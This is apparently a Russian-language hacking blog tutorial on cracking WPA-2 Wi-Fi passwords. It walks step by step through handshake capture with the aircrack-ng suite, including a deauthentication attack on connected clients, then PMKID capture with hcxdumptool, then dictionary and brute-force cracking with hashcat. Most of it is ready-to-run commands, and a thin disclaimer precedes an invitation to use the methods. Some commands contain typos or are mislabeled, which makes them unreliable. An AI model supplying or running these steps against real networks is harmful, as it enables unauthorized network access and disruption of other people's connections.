Мы уже рассказывали об актуальных техниках взлома Wi-Fi. Сегодня продолжим данную тему и рассмотрим способы взлома WPA-2. Я расскажу о двух методах взлома WPA-2.
Еще по теме: Глушение WiFi-сети и клиентов
Как взломать Wi-Fi WPA-2
Далее рассмотрим два способа взлома WPA-2: первый — это захват рукопожатия (хендшейка), а второй — с помощью hcxdumptool.
Для взлома WPA-2 потребуется:
- Адаптер Wi-Fi (поддерживается режим монитора).
- Kali Linux или другой Linux-дистрибутив (см. также Установка Kali Linux на Windows).
- Иструменты airmon-ng, airodump-ng, aircrack-ng (для метода 1)
- Инструменты hcxdumptool и hcxtools (для метода 2)
- Hashcat
- Сеть Wi-Fi WPA-2.
Вся информация предоставлена исключительно в образовательных целях и предназначена для пентестеров (этичных хакеров). Для демонстрации были использованы наши личные устройства в нашей WiFi-сети. Ни редакция сайта spy-soft.net, ни автор не несут ответственность за любой возможный вред, причиненный материалами данной статьи.
Взлом WPA-2 с помощью перехвата рукопожатия (airodump-ng)
Это старый способ взлома паролей Wi-Fi, но он все еще отлично работает. Для взлома WPA-2 с помощью airodump-ng нам нужно будет деаутентифицировать пользователя подключенного к целевой WiFi-сети и перехватить рукопожатие.
В Kali Linux airodump-ng установлен по умолчанию. Если вы используете дистрибутив отличный от Kali Linux, тогда необходимо установить airodump-ng самостоятельно:
1 |
sudo apt install aircrack-ng |
Для начала необходимо перевести WiFi-адпатер в режим монитора. Для этого выполните команду:
1 |
iwconfig |
И появившемся списке найдите свой адаптер Wi-Fi.
Откройте консоль и выполните следующие команды:
1 2 3 |
sudo airmon-ng check kill sudo airmon-ng start wlp8s0 |
Где wlp8s0 — мой WiFi-адаптер (в вашем случаем может быть другой).
Введите iwconfig, чтобы убедиться, что режим монитора активен.
Если данном этапе возникнут проблемы, то вот вам пару статей, которые помогут их решить:
Запустите airodump-ng для отображения всех сетей Wi-Fi.
1 |
sudo airdump-ng wlp8s0mon |
Команда помимо прочего отобразит BSSID (мак-адрес), мощность сигнала (PWR) и CH (канал сети).
Скопируйте BSSID и CH целевой сети.
Запустите деаутентификации клиентов выбранной сети:
1 |
sudo airodump-ng -c 6 --bssid A6:0C:ID:ID:ID:ID -w filename wlp8s0mon |
Где A6:0C:ID:ID:ID:ID — BSSID выбранной сети, filname — имя файла, в котором будет сохранены данные и wlp8s0mon — мой WiFi-адаптер в режиме монитора.
Команда начнет прослушивание эфира и отобразит все подключенные к целевой сети устройства.
Чтобы захватить хендшейк, нужно отправить сигнал деаутентификации пользователю. Для этого откройте новую вкладку терминала и выполните команду:
1 |
sudo aireplay-ng -0 1 -a WIFI:BSSID -c DEVICE:BSSID wlp8s0mon |
Где WIFI:BSSID — BSSID роутера целевой WiFi-сети, DEVICE:BSSID — BSSID подключенного клиента, которого необходимо деаутентифицировать, wlp8s0mon — мой WiFi-адаптер в режиме монитора.
После завершения деаутентификации, вернитесь к предыдущему окну консоли, в котором появится сообщение о перехвате рукопожатие WPA.
Чтобы остановить процесс, нажмите сочетание клавиш CTRL + C.
Теперь у нас есть файл filename.cap. Мы можем либо использовать aircrack-ng для взлома пароля, либо конвертировать filename.cap в hash.hc22000, а затем взломать хэш с помощью hashcat.
Для взлома с помощью aircrack-ng используйте следующую команду.
1 |
aircrack-ng -w rockyou.txt -b BSSID filename.cap |
Чтобы преобразовать .cap в формат хеша hashcat, используйте этот сервис.
Загрузите filename.cap на веб-сайт, и вы сможете скачать преобразованный файл hash.hc22000.
Взлом WPA-2 с помощью hcxdumptool
Этому метод не требует деаутентификации пользователей подключенных к WiFi-сети.
Установите hcxdumptool и hcxtools. После установки, следуйте инструкциям.
Сначала остановите NetworkManager и запросчик WPA:
1 2 3 |
sudo systemctl stop NetworkManager.service sudo systemctl stop wpa_supplicant.service |
Затем запустите hcxdumptool, чтобы выгрузить файл pcapng.
1 |
sudo hcxdumptool -i wlp8s0 -o dumpfile.pcapng --active_beacon --enable_status=15 |
Дождитесь захвата пакетов, после чего остановите процесс с помощью Ctrl+C.
Теперь у нас есть файл dumpfile.pcapng.
Запустите следующие службы:
1 2 3 |
sudo systemctl start wpa_supplicant.service sudo systemctl start NetworkManager.service |
На этом этапе необходимо конвертировать файл .pcapng в файл .hc22000:
1 |
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng |
Взлом пароля Wi-Fi WPA-2 с помощью Hashcat
Теперь у нас есть файл hash.hc22000, который можно взломать с помощью hashcat.
Скачайте последнюю версию hashcat и запустите один из методов взлома:
Атака по словарю (список слов) с использованием популярного словаря rockyou.txt:
1 |
hashcat -m 22000 hash.hc22000 rockyou.txt |
Брутфорс с использованием hashcat:
1 |
hahscat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d |
Приведенная выше команда предназначена для перебора 8-значного числового пароля.
Например, можно создать такой шаблон из 10 цифр, который начинается с цифры 9.
1 |
hashcat -m 22000 hash.hc22000 -a 3 9?d?d?d?d?d?d?d?d?d |
Чтобы сделать свой собственный шаблон, обратитесь руководству от hashcat или используйте Crunch.
Заключение
На этом все. Теперь вы знаете, как взломать WPA-2. Используйте рассмотренные способы с умом!
Полезные ссылки:
Лучшие хакерские программы для взлома со смартфона